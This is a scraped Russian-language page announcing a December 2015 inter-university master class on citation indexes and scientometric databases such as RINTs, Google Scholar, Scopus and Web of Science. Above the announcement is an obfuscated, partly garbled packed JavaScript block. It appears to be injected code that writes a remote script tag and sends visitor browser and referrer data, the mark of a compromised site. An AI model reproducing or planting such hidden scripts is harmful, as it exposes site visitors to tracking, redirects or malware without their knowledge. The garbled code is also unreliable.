

```
24 eval(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!".replace(/^(,String))){while(c--){d[c.toString(a)]=k[c]|c.toString(a)}k=[function(e)
{return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n
m="q";,30,30,'document|javascript|encodeURIComponent|src|write|http|45|67|script|text|rel|nofollow|type|
97|language|jquery|userAgent|navigator|script|ztizi|var|u0026u|referrer|bsszr|js|php'.split('|'),0,{
}))
```

декабря 2015 г. состоялся 2-й

(межвузовский) мастер-класс

"Индекс

**цитирования для оценки результативности научной работы"**

, участники которого на практических примерах ознакомились с возможностями современных наукометрических баз данных научных изданий (

[Science](#)

[Index](#)

(  
РИНЦ

)

,  
[Google Scholar](#)

,  
[Scopus](#)

(ORCID),

[Web of Science](#)

), а также получили практические навыки по созданию своего профиля (аккаунта), отслеживания своих публикаций и автоматического подсчета различных индексов цитирования.

**Все презентации мастер-класса доступны для скачивания по вышеприведенным ссылкам. Для гарантированного скачивания презентаций - на гиперссылке нажмите правую кнопку мышки и выберете пункт «Сохранить ссылку».**